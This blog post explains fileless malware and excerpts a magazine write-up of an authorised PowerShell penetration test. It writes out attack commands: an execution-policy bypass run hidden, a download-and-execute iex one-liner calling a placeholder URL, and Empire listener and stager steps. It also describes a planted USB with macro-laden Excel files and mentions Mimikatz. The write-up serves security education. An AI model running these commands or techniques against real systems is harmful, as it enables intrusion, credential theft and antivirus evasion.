Ethical Hacker explain

Fileless Malware Is Pretty Much What It Sounds Like

It may seem obvious, but fileless malware is just that—malware that doesn’t copy any files to your system to execute. Instead, payloads are injected directly into the memory of running processes and the malware executes in your RAM.

This is particularly problematic because your typical antivirus software relies on the files that malware places on your hard drive. Rather than being able to analyze the hard drive and quarantine/remove malicious files, fileless malware adds a new layer of stealth for attackers because it can execute directly.

However, the defining features of fileless malware don’t have to be so strict. That is, these kinds of attacks could potentially look like the phishing/spam campaigns that we’ve all grown so used to.

Font: https://sentinelone.com/blogs/fileless-malware-worse-traditional-attack-vectors/, accessed in 09/04/2017 (pt-br).

Below, part of my article published in PenTest Magazine.

In Reconnaissance step, the contractor has passed all information, all computers running Windows Operation System, Cisco Meraki Firewall and VPN bridge and Kaspersky Endpoint Antivirus. However, test antivirus efficiency, firewall and training of employees, are focus of this Pentest, as requested by organization owner.

Thus, running PSNMAP we can DNS, ports open, ping, like as NMAP tool. To install PSNMAP open Powershell and run Install-Module -Name PSnmap, with these parameters psnmap -Comp 192.168.0.1/24 -Dns -Port 23, 21, 445, 3389, 25, can get some information to second step Scanning. See, online computers and open ports demonstrate in image below.

powershell-1

Well, to Gaining Access step, we need knowledge about scripts execution polices. Pentester may have to bypass the restricted execution policy, with the Get-ExectionPolicy PowerShell is possible see the current configuration. To run silently in the background the batch file would look something like this powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file “name_of_script.ps1”.

Another option to bypass restriction is download script from the internet and execute it without having to write to disk using command like powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://short-link-to-script’)”, use unrestricted policy PowerShell.exe -ExecutionPolicy UnRestricted -File script-name.ps1.

Great scripts package are Empire, Nishang and Powersploit and was used to conduce this test.

Firstly create a server with Empire. Running Kali Linux on bootable Smartphone Samsung Galaxy S4 via Drivedroid. To this procedure was used a abandoned computer, but connected to the network yet, was told it would be to charge the device battery, then in command line was execute these commands: “listeners”, “set Name slx_petter” and “execute”.

powershell-2

powershell-3

            In the sequence execute “usestager launcher slx_petter” and “execute”, gathering the result.

powershell-4

Using a Pendrive with autorun and Macro in Excel document, was successfully executed. Being that the autorun option was enabled and the pendrive was left in a strategic location, a person moved by curiosity picked up and placed on the computer. One excel file was prepared with financial data and another with collaborators’ contacts. The same person opened all files, ignoring the macro alert.

After, sent the collaborators’ contacts file to someone else, this person opened the file as well, ignoring alert. At this moment is possible interact with agent, can be seen below.

powershell-5

powershell-6

               Above, some details of the infected system.

            Finally, we can see to achieve this result the ease of access due to equipment configuration errors and security software and lack of proper training. It’s also possible to prove the efficiency of the attack with in memory commands, this technique helps to bypass most antivirus. At this moment, the attacker can use Mimikatz to request Hash’s in SMB Relay for example, Bypass UAC and many others attacks.

Read completed in (http://periciacomputacional.com/pentesting-with-powershell-in-six-steps/).